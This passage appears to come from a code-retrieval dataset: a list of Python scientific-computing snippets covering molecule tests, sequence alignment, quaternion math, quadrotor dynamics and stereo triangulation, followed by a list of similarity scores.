self.assertEqual(mol3.to_smiles(), '[N]=C=C(C)C')\n self.assertEqual(mol4.to_smiles(), 'N#CC(N=NC(C#N)(C)C)(C)C')\n self.assertEqual(mol5.to_smiles(), '[O-][O+]=O')\n self.assertEqual(mol6.to_smiles(), 'N#S')\n self.assertEqual(mol7.to_smiles(), '[N-]=[NH2+]')\n self.assertEqual(mol8.to_smiles(), 'C#N')\n # self.assertEqual(mol9.to_smiles(), '[N-]=[S+]#N') # gives [N]S#N, multiplicity 3\n # self.assertEqual(mol10.to_smiles(), '[N+](=O)(O)[O-]') # gives None\n # self.assertEqual(mol11.to_smiles(), 'N(N)[N+](=O)[O-]') # gives None\n self.assertEqual(mol12.to_smiles(), '[O]N=O')\n # self.assertEqual(mol13.to_smiles(), 'C[N+]([NH-])=O') # gives None\n self.assertEqual(mol14.to_smiles(), '[O]S(=O)O')\n self.assertEqual(mol15.to_smiles(), '[N-]=[N+]=N')\n self.assertEqual(mol16.to_smiles(), '[O]N=C')\n self.assertEqual(mol17.to_smiles(), '[O-][S+](=O)(O)O')\n self.assertEqual(mol18.to_smiles(), 'O=S(=O)=O')\n self.assertEqual(mol19.to_adjacency_list(), \"\"\"multiplicity 2\n1 N u1 p1 c0 {4,S} {5,S}\n2 N u0 p1 c0 {3,S} {5,D}\n3 C u0 p0 c0 {2,S} {4,D} {6,S}\n4 C u0 p0 c0 {1,S} {3,D} {7,S}\n5 C u0 p0 c0 {1,S} {2,D} {8,S}\n6 H u0 p0 c0 {3,S}\n7 H u0 p0 c0 {4,S}\n8 H u0 p0 c0 {5,S}\n\"\"\") # cannot read SMILES 'c1ncc[n]1' (but can generate them)\n self.assertEqual(mol20.to_smiles(), 'C=C[CH]C=CC')", "def smith_waterman_fill(self):\r\n\r\n matrix = self.empty_matrix() # Building on the previous definition\r\n\r\n def score_cell(i,j):\r\n \"\"\"\r\n This scoreing definition will return the score of\r\n a position (i, j) based on the left, upper, and upper left values.\r\n Your scoring function should:\r\n * Choose the maximum of the following 4 values for the score\r\n * the value of (i-1, j) + insertion/deletion penalty\r\n * the value of (i, j-1) + insertion/deletion penalty\r\n * If the characters at i-1 and j-1 in s1 and s2 respectively match:\r\n the value of (i-1, j-1) + match score\r\n else\r\n the value of (i-1, j-1) + mismatch penalty\r\n * 0 (if all other numbers are negative, use 0)\r\n :param i: integer, the outer list index\r\n :param j: integer, the inner list index\r\n :return: integer\r\n \"\"\"\r\n match = 3\r\n mismatch = -3\r\n ins_del = -2\r\n \r\n up = matrix[i-1][j]+ ins_del\r\n left = matrix[i][j-1]+ ins_del\r\n \r\n if self.s1[i-1] == self.s2[j-1]:\r\n diag = matrix[i-1][j-1] + match\r\n else:\r\n diag = matrix[i-1][j-1] + mismatch\r\n \r\n return max(up, left, diag)\r\n \r\n for i in range(1,len(self.s1)+1):\r\n for j in range(1,len(self.s2)+1):\r\n matrix[i][j] =score_cell(i,j)\r\n \r\n return matrix", "def _two_body(edge_matrix_indices: numpy.ndarray, p: int, q: int, r: int,\n s: int) -> QubitOperator:\n # Initialize qubit operator.\n qubit_operator = QubitOperator()\n\n # Handle case of four unique indices.\n if len(set([p, q, r, s])) == 4:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_pq = edge_operator_aij(edge_matrix_indices, p, q)\n A_rs = edge_operator_aij(edge_matrix_indices, r, s)\n qubit_operator += 1 / 8. 
* A_pq * A_rs * (-QubitOperator(\n ()) - B_p * B_q + B_p * B_r + B_p * B_s + B_q * B_r + B_q * B_s -\n B_r * B_s +\n B_p * B_q * B_r * B_s)\n return qubit_operator\n\n # Handle case of three unique indices.\n elif len(set([p, q, r, s])) == 3:\n # Identify equal tensor factors.\n if p == r:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_qs = edge_operator_aij(edge_matrix_indices, q, s)\n qubit_operator += 1j * (A_qs * B_s + B_q * A_qs) * (QubitOperator(\n ()) - B_p) / 4.\n\n elif p == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n A_qr = edge_operator_aij(edge_matrix_indices, q, r)\n qubit_operator += -1j * (A_qr * B_r + B_q * A_qr) * (QubitOperator(\n ()) - B_p) / 4.\n\n elif q == r:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_s = edge_operator_b(edge_matrix_indices, s)\n A_ps = edge_operator_aij(edge_matrix_indices, p, s)\n qubit_operator += -1j * (A_ps * B_s + B_p * A_ps) * (QubitOperator(\n ()) - B_q) / 4.\n\n elif q == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n B_r = edge_operator_b(edge_matrix_indices, r)\n A_pr = edge_operator_aij(edge_matrix_indices, p, r)\n qubit_operator += 1j * (A_pr * B_r + B_p * A_pr) * (QubitOperator(\n ()) - B_q) / 4.\n\n # Handle case of two unique indices.\n elif len(set([p, q, r, s])) == 2:\n # Get coefficient.\n if p == s:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n qubit_operator += (QubitOperator(()) - B_p) * (QubitOperator(\n ()) - B_q) / 4.\n\n else:\n B_p = edge_operator_b(edge_matrix_indices, p)\n B_q = edge_operator_b(edge_matrix_indices, q)\n qubit_operator += -(QubitOperator(()) - B_p) * (QubitOperator(\n ()) - B_q) / 4.\n\n return qubit_operator", "def __mul__(self, quat2):\n p4=quat2.w\n p = quat2.imaginary\n p_cross = skew_symmetric(p)\n A=np.zeros((4,4))\n A[:3,:3]=p4*np.eye(3)+p_cross\n A[3,0:3] = -p.T\n A[:3,3] = p\n A[3,3] = p4\n quat_as_vector = dot(A,self.asColVector(\"xyzw\"))\n return Quat(quat_as_vector)", "def square(i, j):\n return map(sq_start, [i, j, i + 1, j + 1])", "def learned_RHS(t,y,q,x,desc):\n \n \n Ux_mat = create_Ux_mat(x)\n Uxx_mat = create_Uxx_mat(x)\n\n return (q[desc.index('u_{x}')]*Ux_mat.dot(y) + \n q[desc.index('u_{xx}')]*Uxx_mat.dot(y) +\n q[desc.index('u^2')]*y**2 +\n q[desc.index('u')]*y + \n q[desc.index('u^2u_{x}')]*(y**2)*Ux_mat.dot(y) + \n q[desc.index('uu_{x}')]*y*Ux_mat.dot(y) + \n q[desc.index('u^2u_{xx}')]*(y**2)*Uxx_mat.dot(y) + \n q[desc.index('uu_{xx}')]*y*Uxx_mat.dot(y) + \n q[desc.index('u_{x}^2')]*Ux_mat.dot(y)**2)", "def upper(mat):\n idx = np.triu_indices_from(mat, k=1)\n return mat[idx]", "def _holt__(x, xi, p, y, l, b, s, m, n, max_seen):\n alpha, beta, phi, alphac, betac, y_alpha = _holt_init(x, xi, p, y, l, b)\n for i in range(1, n):\n l[i] = (y_alpha[i - 1]) + (alphac * (l[i - 1]))\n return sqeuclidean(l, y)", "def inv(self, Am):\r\n # Section 1: MAmke sure Am cAmn be inverted.\r\n self.check_squareness(Am)\r\n self.check_non_singular(Am)\r\n \r\n # Section 2: MAmke copies of Am & I, AmM & IM, to use for row ops\r\n n = len(Am)\r\n AmM = self.copy_matrix(Am)\r\n I = self.identity_matrix(n)\r\n IM = self.copy_matrix(I)\r\n \r\n # Section 3: Perform row operAmtions\r\n indices = list(range(n)) # to Amllow flexible row referencing 
***\r\n for fd in range(n): # fd stAmnds for focus diAmgonAml\r\n fdScAmler = 1.0 / AmM[fd][fd]\r\n # FIRST: scAmle fd row with fd inverse. \r\n for j in range(n): # Use j to indicAmte column looping.\r\n AmM[fd][j] *= fdScAmler\r\n IM[fd][j] *= fdScAmler\r\n # SECOND: operAmte on Amll rows except fd row Ams follows:\r\n for i in indices[0:fd] + indices[fd+1:]: \r\n # *** skip row with fd in it.\r\n crScAmler = AmM[i][fd] # cr stAmnds for \"current row\".\r\n for j in range(n): \r\n # cr - crScAmler * fdRow, but one element Amt Am time.\r\n AmM[i][j] = AmM[i][j] - crScAmler * AmM[fd][j]\r\n IM[i][j] = IM[i][j] - crScAmler * IM[fd][j]\r\n \r\n return IM", "def sqrty():\n return Operator([[(1.+1.j)/2,(-1-1.j)/2],[(1.+1.j)/2,(1.+1.j)/2]])", "def test_get_Q_alt(self):\n vect_length = 50\n x_vect = np.random.normal(size=vect_length) \\\n + 1.j * np.random.normal(size=vect_length)\n y_vect = np.random.normal(size=vect_length) \\\n + 1.j * np.random.normal(size=vect_length)\n\n self.ds.spw_Nfreqs = vect_length\n\n for i in range(vect_length):\n Q_matrix = self.ds.get_Q_alt(i)\n # Test that if the number of delay bins hasn't been set\n # the code defaults to putting that equal to Nfreqs\n self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)\n\n xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))\n yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n\n # Test that Q matrix has the right shape\n self.assertEqual(Q_matrix.shape, (vect_length, vect_length))\n\n # Test that x^t Q y == conj(y^t Q x)\n self.assertAlmostEqual(xQy, np.conjugate(yQx))\n\n # x^t Q x should be real\n self.assertAlmostEqual(np.imag(xQx), 0.)\n\n x_vect = np.ones(vect_length)\n Q_matrix = self.ds.get_Q_alt(vect_length//2)\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n self.assertAlmostEqual(xQx, np.abs(vect_length**2.))\n # Sending in sinusoids for x and y should give delta functions\n\n # Now do all the same tests from above but for a different number\n # of delay channels\n self.ds.set_Ndlys(vect_length-3)\n for i in range(vect_length-3):\n Q_matrix = self.ds.get_Q_alt(i)\n xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))\n yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n\n # Test that Q matrix has the right shape\n self.assertEqual(Q_matrix.shape, (vect_length, vect_length))\n\n # Test that x^t Q y == conj(y^t Q x)\n self.assertAlmostEqual(xQy, np.conjugate(yQx))\n\n # x^t Q x should be real\n self.assertAlmostEqual(np.imag(xQx), 0.)\n\n x_vect = np.ones(vect_length)\n Q_matrix = self.ds.get_Q_alt((vect_length-2)//2-1)\n xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))\n self.assertAlmostEqual(xQx, np.abs(vect_length**2.))\n # Sending in sinusoids for x and y should give delta functions\n\n # Make sure that error is raised when asking for a delay mode outside\n # of the range of delay bins\n pytest.raises(IndexError, self.ds.get_Q_alt, vect_length-1)\n\n # Ensure that in the special case where the number of channels equals\n # the number of delay bins, the FFT method gives the same answer as\n # the explicit construction method\n multiplicative_tolerance = 0.001\n self.ds.set_Ndlys(vect_length)\n for alpha in range(vect_length):\n Q_matrix_fft = self.ds.get_Q_alt(alpha)\n Q_matrix = self.ds.get_Q_alt(alpha, allow_fft=False)\n Q_diff_norm = np.linalg.norm(Q_matrix - Q_matrix_fft)\n self.assertLessEqual(Q_diff_norm, 
multiplicative_tolerance)\n\n # Check for error handling\n pytest.raises(ValueError, self.ds.set_Ndlys, vect_length+100)", "def refLinearizeSquared(image, detector):\n ampInfoCat = detector.getAmpInfoCatalog()\n for ampInfo in ampInfoCat:\n bbox = ampInfo.getBBox()\n sqCoeff = ampInfo.getLinearityCoeffs()[0]\n viewArr = image.Factory(image, bbox).getArray()\n viewArr[:] = viewArr + sqCoeff*viewArr**2", "def quad_eq_of_motion2(self,state,time,force,moment):\n\n\t\t\tA = np.matrix([ [0.25,0, -0.5/self.arm_length],\n\t\t\t\t[0.25,0.5/self.arm_length,0.],\n\t\t\t\t[0.25,0,0.5/self.arm_length],\n\t\t\t\t[0.25,-0.5/self.arm_length,0]])\n\t\t\tT=A*np.asmatrix(np.hstack((force,moment[:2]))).transpose()\n\t\t\tT_clamped=np.maximum(np.minimum(T,self.max_force/4.0),self.min_force/4.0)\n\t\t\tB = np.matrix([[1.0,1.0,1.0,1.0],\n\t\t\t\t\t\t\t[0.0,self.arm_length,0.0,-self.arm_length],\n\t\t\t\t\t\t\t[-self.arm_length,0.0,self.arm_length,0.]])\n\t\t\tforce = B[[0],:]*T_clamped;\n\t\t\tforce = np.array(force).reshape(-1,).tolist()\n\t\t\tmoment = np.vstack( (B[[1,2],:]*np.asmatrix(T_clamped), moment[2]));\n\t\t\tmoment = np.array(moment).reshape(-1,).tolist()\n\t\t\t\n\t\t\t#Assign 13 states\n\t\t\t#x = state[0]\n\t\t\t#y = state[1]\n\t\t\t#z = state[2]\n\t\t\txdot = state[3];\n\t\t\tydot = state[4];\n\t\t\tzdot = state[5];\n\t\t\tqW = state[6];\n\t\t\tqX = state[7];\n\t\t\tqY = state[8];\n\t\t\tqZ = state[9];\n\t\t\tp = state[10];\n\t\t\tq = state[11];\n\t\t\tr = state[12];\n\n\t\t\tquat = np.vstack((qW,qX,qY,qZ)); #!! Attention to the order!!\n\t\t\tbRw=self.quat2mat(quat.transpose())\n\t\t\tbRw=bRw.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\t\twRb = bRw.transpose()\n\t\t\t\n\t\t\t# Acceleration\n\t\t\taccel = 1.0 / self.mass * (wRb * np.matrix([[0],[0],force]) - np.matrix([[0],[0],[self.mass * self.gravity]]))\n\t\t\taccel = np.array(accel).reshape(-1,).tolist()\n\t\t\t# Angular velocity\n\t\t\tK_quat = 2.0; #%this enforces the magnitude 1 constraint for the quaternion\n\t\t\tquaterror = 1 - (qW**2 + qX**2 + qY**2 + qZ**2);\n\t\t\tqdot = -1/2*np.matrix([ [0,-p,-q,-r],[p,0,-r,q],[q,r,0,-p],[r,-q,p,0]])*quat + K_quat*quaterror * quat\n\t\t\tqdot = np.array(qdot).reshape(-1,).tolist()\n\t\t\t# % Angular acceleration\n\t\t\tomega = np.matrix([[p],[q],[r]])\n\t\t\ttemp = np.squeeze(np.cross(omega.transpose(),(self.Inertia*omega).transpose()))\n\t\t\tpqrdot = self.invInertia * (moment - temp).reshape(-1,1)\n\t\t\tsdot=np.zeros(13) #default=float64\n\t\t\tsdot[0]=xdot#[]\n\t\t\tsdot[1]=ydot\n\t\t\tsdot[2]=zdot\n\t\t\tsdot[3]=accel[0]\n\t\t\tsdot[4]=accel[1]\n\t\t\tsdot[5]=accel[2]\n\t\t\tsdot[6]=qdot[0]\n\t\t\tsdot[7]=qdot[1]\n\t\t\tsdot[8]=qdot[2]\n\t\t\tsdot[9]=qdot[3]\n\t\t\tsdot[10]=pqrdot[0]\n\t\t\tsdot[11]=pqrdot[1]\n\t\t\tsdot[12]=pqrdot[2]\n\t\t\treturn sdot", "def rayleigh(th,r,wl,a,n1,n2):\n k = 2*np.pi/wl\n n_2 = n2**2/n1**2\n return ((k**2)*(a**3)*((n_2-1)/(n_2+2))/r)*np.array([[np.cos(th), 0],[0,1]])", "def high_level(low_scores, query, template_length):\n h_mat = prog_dynam_matrix(list(range(template_length)), query)\n h_mat.create_content()\n h_mat.fill_high(low_scores)\n h_mat.show()\n h_mat.optimal_path()", "def h(surj):\n answer = s(surj)\n for r in range(1, arity - 1):\n answer += i(s(p(surj, r)), r)\n return answer", "def slerp(targettime, time, q):\n #debug_here()\n i_interp_int, t_matrix = compute_t(targettime, time)\n q_interp = mult(q[np.clip(i_interp_int + 1,0,len(time)-1),:], inv(q[i_interp_int,:]))\n q_interp = pow(q_interp, t_matrix) \n q_interp = mult(q_interp, 
q[i_interp_int,:])\n t_zero = (t_matrix == 0).flatten()\n q_interp[t_zero] = q[i_interp_int][t_zero]\n return q_interp", "def _makequads_all(self):\n nholes = self.ctrs.shape[0]\n qlist = []\n for i in range(nholes):\n for j in range(nholes):\n for k in range(nholes):\n for q in range(nholes):\n if i < j and j < k and k < q:\n qlist.append((i, j, k, q))\n qarray = np.array(qlist).astype(np.int)\n if self.verbose:\n print(\"qarray\", qarray.shape, \"\\n\", qarray)\n qname = []\n uvwlist = []\n # foreach row of 3 elts...\n for quad in qarray:\n qname.append(\"{0:d}_{1:d}_{2:d}_{3:d}\".format(\n quad[0], quad[1], quad[2], quad[3]))\n if self.verbose:\n print('quad:', quad, qname[-1])\n uvwlist.append((self.ctrs[quad[0]] - self.ctrs[quad[1]],\n self.ctrs[quad[1]] - self.ctrs[quad[2]],\n self.ctrs[quad[2]] - self.ctrs[quad[3]]))\n if self.verbose:\n print(qarray.shape, np.array(uvwlist).shape)\n return qarray, np.array(uvwlist)", "def bidimensional_map_lin(h, t, x, y, x_0, y_0):\n gamma = 3 * np.pi\n r = np.sqrt(np.square(x - x_0) + np.square(y - y_0))\n\n f = lambda r: gamma * r + (gamma / 2) * r**2 + np.sqrt(r)\n\n return h(t) * f(r)", "def triangulate(Kl, Kr, Twl, Twr, pl, pr, Sl, Sr):\r\n #--- FILL ME IN ---\r\n \r\n # Compute baseline (right camera translation minus left camera translation)\r\n Cr = (Twr)[0:3,-1] #left camera translaton\r\n Cl = (Twl)[0:3,-1] #right camera translation\r\n b = (Cr - Cl).reshape(3,1)\r\n \r\n \r\n # Unit vectors projecting from optical center to image plane points.\r\n # Use variables rayl and rayr for the rays.\r\n rayl = Twl[0:3,0:3].dot(inv(Kl)).dot(np.insert(pl,2,1, axis =0))\r\n rayl = rayl/norm(rayl) #convert to unit vector\r\n \r\n rayr = Twr[0:3,0:3].dot(inv(Kr)).dot(np.insert(pr,2,1, axis =0))\r\n rayr = rayr/norm(rayr) #convert to unit vector\r\n \r\n \r\n # Projected segment lengths.\r\n # Use variables ml and mr for the segment lengths.\r\n rLrR = rayl.T.dot(rayr)[0][0]\r\n ml = ((b.T.dot(rayl) - (b.T.dot(rayr))*(rLrR))/(1-rLrR**2))[0][0]\r\n mr = (rLrR*ml - b.T.dot(rayr))[0][0]\r\n \r\n # Segment endpoints.\r\n # User variables Pl and Pr for the segment endpoints.\r\n Pl = Cl.reshape(3,1) + rayl*ml\r\n Pr = Cr.reshape(3,1) + rayr*mr\r\n \r\n # Now fill in with appropriate ray Jacobians. These are \r\n # 3x4 matrices, but two columns are zeros (because the right\r\n # ray direction is not affected by the left image point and \r\n # vice versa).\r\n drayl = np.zeros((3, 4)) # Jacobian left ray w.r.t. image points.\r\n drayr = np.zeros((3, 4)) # Jacobian right ray w.r.t. image points.\r\n \r\n # Add code here...\r\n #rayl = f(x)_l/g(x)_l = r/norm(r). Equation for unit vector provided in the assignment\r\n #drayl = d/dx[f(x)_l/g(x)_l] = ( d/dx[f(x)_l]*g(x)_l - f(x)_l*d/dx[g(x)_l] / [g(x)_l]^2 )\r\n #where x is the image plane points in the left camera ul (i.e pl[0][0]), vl (i.e pl[1][0]), \r\n #and right camera ur (i.e pr[0][0]), vr (i.e pr[1][0])\r\n \r\n #As per equation in the assignment. I.e column vector (c1*u, c2*v, c3)\r\n fxl = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[pl[0][0]],[pl[1][0]],[1]]))\r\n \r\n #f(x)_l = column vector(c1*ul, c2*vl + c3). 
\r\n #Therefore f(x)_l w.r.t u = f(x)l_u = column vector (c1, 0, 0,)\r\n fxl_u = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[1],[0],[0]]))\r\n #Therefore f(x)_l w.r.t v = f(x)l_v = column vector (0, c2, 0,)\r\n fxl_v = Twl[:3,:3].dot(inv(Kl)).dot(np.array([[0],[1],[0]]))\r\n \r\n #Same math applied as with f(x)_l shown above - only that it is with the right camera\r\n fxr = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[pr[0][0]],[pr[1][0]],[1]]))\r\n fxr_u = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[1],[0],[0]]))\r\n fxr_v = Twr[:3,:3].dot(inv(Kr)).dot(np.array([[0],[1],[0]]))\r\n \r\n #Recall from above that g(x)_l = norm(r)\r\n gxl = norm(fxl)\r\n #g(x)_l wrt to u is; u*c1^2/norm(r). Where u*c1^2 = fxl_u.T.dot(fxl)\r\n # and gxl = norm(r)\r\n gxl_u = fxl_u.T.dot(fxl)/gxl \r\n #g(x)_l wrt to v is; v*c2^2/norm(r). Where v*c2^2 = fxl_v.T.dot(fxl)\r\n # and gxl = norm(r) \r\n gxl_v = fxl_v.T.dot(fxl)/gxl\r\n \r\n # same as above except with the right camera\r\n gxr = norm(fxr)\r\n gxr_u = fxr_u.T.dot(fxr)/gxr\r\n gxr_v = fxr_v.T.dot(fxr)/gxr\r\n \r\n #Fill in Jacobian results with results from above \r\n drayl[:,0] = ((fxl_u.dot(gxl) - fxl.dot(gxl_u))/(gxl*gxl)).reshape(3,)\r\n drayl[:,1] = ((fxl_v.dot(gxl) - fxl.dot(gxl_v))/(gxl*gxl)).reshape(3,) \r\n drayr[:,2] = ((fxr_u.dot(gxr) - fxr.dot(gxr_u))/(gxr*gxr)).reshape(3,)\r\n drayr[:,3] = ((fxr_v.dot(gxr) - fxr.dot(gxr_v))/(gxr*gxr)).reshape(3,)\r\n \r\n \r\n \r\n #------------------\r\n \r\n # Compute dml and dmr (partials wrt segment lengths).\r\n # Compute dml and dmr (partials wrt segment lengths).\r\n u = np.dot(b.T, rayl) - np.dot(b.T, rayr)*np.dot(rayl.T, rayr)\r\n v = 1 - np.dot(rayl.T, rayr)**2\r\n\r\n du = (b.T@drayl).reshape(1, 4) - \\\r\n (b.T@drayr).reshape(1, 4)*np.dot(rayl.T, rayr) - \\\r\n np.dot(b.T, rayr)*((rayr.T@drayl) + (rayl.T@drayr)).reshape(1, 4)\r\n \r\n dv = -2*np.dot(rayl.T, rayr)*((rayr.T@drayl).reshape(1, 4) + \\\r\n (rayl.T@drayr).reshape(1, 4))\r\n\r\n m = np.dot(b.T, rayr) - np.dot(b.T, rayl)@np.dot(rayl.T, rayr)\r\n n = np.dot(rayl.T, rayr)**2 - 1\r\n\r\n dm = (b.T@drayr).reshape(1, 4) - \\\r\n (b.T@drayl).reshape(1, 4)*np.dot(rayl.T, rayr) - \\\r\n np.dot(b.T, rayl)@((rayr.T@drayl) + (rayl.T@drayr)).reshape(1, 4)\r\n dn = -dv\r\n\r\n dml = (du*v - u*dv)/v**2\r\n dmr = (dm*n - m*dn)/n**2\r\n\r\n # Finally, compute Jacobian for P w.r.t. 
image points.\r\n JP = (ml*drayl + rayl*dml + mr*drayr + rayr*dmr)/2\r\n \r\n #--- FILL ME IN ---\r\n \r\n # 3D point.\r\n P = (Pl + Pr)/2\r\n \r\n # 3x3 landmark point covariance matrix (need to form\r\n # the 4x4 image plane covariance matrix first).\r\n M = np.zeros((4,4))\r\n M[0:2,0:2] = Sl\r\n M[2:4,2:4] = Sr\r\n \r\n S = JP.dot(M).dot(JP.T) #as per equation in the assignment\r\n\r\n # Check for correct outputs...\r\n correct = isinstance(Pl, np.ndarray) and Pl.shape == (3, 1) and \\\r\n isinstance(Pr, np.ndarray) and Pr.shape == (3, 1) and \\\r\n isinstance(P, np.ndarray) and P.shape == (3, 1) and \\\r\n isinstance(S, np.ndarray) and S.shape == (3, 3)\r\n\r\n if not correct:\r\n raise TypeError(\"Wrong type or size returned!\")\r\n\r\n return Pl, Pr, P, S", "def multiply_quaternions( qa, qb ):\n combined = Quaternion()\n\n combined.w = (qa.w * qb.w - qa.x * qb.x - qa.y * qb.y - qa.z * qb.z)\n combined.x = (qa.x * qb.w + qa.w * qb.x + qa.y * qb.z - qa.z * qb.y)\n combined.y = (qa.w * qb.y - qa.x * qb.z + qa.y * qb.w + qa.z * qb.x)\n combined.z = (qa.w * qb.z + qa.x * qb.y - qa.y * qb.x + qa.z * qb.w)\n return combined", "def get_quad_slip(q, rake):\n P0, P1, P2 = q[0:3]\n strike = P0.azimuth(P1)\n dip = get_quad_dip(q)\n s1_local = get_local_unit_slip_vector(strike, dip, rake)\n s0_local = Vector(0, 0, 0)\n qlats = [a.latitude for a in q]\n qlons = [a.longitude for a in q]\n proj = get_orthographic_projection(\n np.min(qlons), np.max(qlons), np.min(qlats), np.max(qlats))\n s1_ll = proj(np.array([s1_local.x]), np.array([s1_local.y]), reverse=True)\n s0_ll = proj(np.array([s0_local.x]), np.array([s0_local.y]), reverse=True)\n s1_ecef = Vector.fromTuple(latlon2ecef(s1_ll[1], s1_ll[0], s1_local.z))\n s0_ecef = Vector.fromTuple(latlon2ecef(s0_ll[1], s0_ll[0], s0_local.z))\n slp_ecef = (s1_ecef - s0_ecef).norm()\n return slp_ecef" ]
[ "0.5514963", "0.52410305", "0.5185732", "0.51259094", "0.5053267", "0.5020422", "0.49390778", "0.4879556", "0.48793352", "0.4878152", "0.4855", "0.4854443", "0.48542276", "0.48520848", "0.48423955", "0.4821107", "0.4791083", "0.47887972", "0.47870728", "0.47847036", "0.47841114", "0.4783863", "0.47800145", "0.47678885", "0.4763263", "0.4752754", "0.47518486", "0.47462255", "0.47438517", "0.47342122", "0.4731886", "0.4730406", "0.4723456", "0.4721337", "0.47117448", "0.47064033", "0.4703165", "0.4685504", "0.46784943", "0.46783403", "0.4671491", "0.4670942", "0.4670942", "0.466681", "0.4664014", "0.46639138", "0.46627274", "0.46618605", "0.4660712", "0.4649648", "0.4636134", "0.46339092", "0.46295887", "0.46283084", "0.46266022", "0.46260878", "0.46140805", "0.46119183", "0.46118927", "0.46086833", "0.46067476", "0.45964712", "0.4593806", "0.45896128", "0.45887083", "0.45872757", "0.45771107", "0.45752844", "0.45733035", "0.4572677", "0.45708475", "0.45685822", "0.45621425", "0.45614862", "0.456146", "0.45569515", "0.45563382", "0.4554371", "0.4545316", "0.4545016", "0.4541337", "0.45383808", "0.45346022", "0.4530449", "0.4527928", "0.45161694", "0.4515946", "0.4513951", "0.45084926", "0.45028844", "0.45012414", "0.45008156", "0.4500205", "0.44991726", "0.44974265", "0.4490736", "0.44900218", "0.44892347", "0.44858834", "0.44836938" ]
0.56926125
0
Quaternion / matrix-based stretch for forearms and lower legs
def lower_twist(lo_arm_ik_jnt, wrist_ik_jnt, lo_arm_jnt, lo_arm_twist_jnts, wrist_jnt=None):

    # Create a group that does not rotate and parent under the ik arm parent (shoulder)
    stable_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_stable_reader', p=lo_arm_ik_jnt)

    # Create a grp that will rotate with ik arm
    twist_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_twist_reader', p=lo_arm_ik_jnt)

    mc.addAttr(twist_reader_grp, ln='twist', k=1)
    mc.delete(mc.pointConstraint(wrist_ik_jnt, twist_reader_grp))
    mc.parent(twist_reader_grp, wrist_ik_jnt)

    # Now set up mult matrix and decomp nodes to extract the twist between the two nodes
    mult_mtx = mc.createNode('multMatrix')
    decomp_mtx = mc.createNode('decomposeMatrix')
    quat_to_euler = mc.createNode('quatToEuler')

    mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]')
    mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]')
    mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix')
    mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX')
    mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW')

    utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist')

    # Connect joints
    mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1)

    if wrist_jnt:
        mc.parentConstraint(wrist_ik_jnt, wrist_jnt, mo=1)

    div = 1.0 / (len(lo_arm_twist_jnts))
    mdl = mc.createNode('multDoubleLinear')
    mc.setAttr(mdl+'.input1', div)
    mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2')

    for i, joint in enumerate(lo_arm_twist_jnts):
        mc.connectAttr(mdl+'.output', joint+'.rx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ar_addStretchSquash():\n setupName = 'Nose'\n sel = cmds.ls(sl=True)\n chain = cmds.ls(sel[0], dag=True, typ='joint')\n IKSpine = cmds.ikHandle(sj=chain[0], ee=chain[len(chain) - 1], sol='ikSplineSolver')\n # rename\n cmds.rename(IKSpine[0], 'IKSplineHandle_' + setupName)\n cmds.rename(IKSpine[1], 'IKSplineEff_' + setupName)\n cmds.rename(IKSpine[2], 'IKSplineCurve_' + setupName)\n # create new joints.\n cmds.select(cl=True)\n bindStartJt = cmds.joint(n='JtCrvBind01')\n cmds.select(cl=True)\n bindEndJt = cmds.joint(n='JtCrvBind02')\n cmds.delete(cmds.parentConstraint(chain[0], bindStartJt))\n cmds.delete(cmds.parentConstraint(chain[len(chain) - 1], bindEndJt))\n\n cmds.skinCluster(bindStartJt, bindEndJt, 'IKSplineCurve_' + setupName, bm=0, sm=0, nw=1, wd=0, mi=2)\n ctlStart = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '01_CTRL', ch=False)\n extraGrp = cmds.createNode('transform', n='Toony' + setupName + '01ExtraGrp')\n offGrp = cmds.createNode('transform', n='Toony' + setupName + '01OffsetGrp')\n cmds.parent(ctlStart[0], extraGrp)\n cmds.parent(extraGrp, offGrp)\n cmds.delete(cmds.parentConstraint(bindStartJt, offGrp))\n # endJOint\n ctlEnd = cmds.circle(nr=[1, 0, 0], n='Toony' + setupName + '02_CTRL', ch=False)\n extraGrpEnd = cmds.createNode('transform', n='Toony' + setupName + '02ExtraGrp')\n offGrpEnd = cmds.createNode('transform', 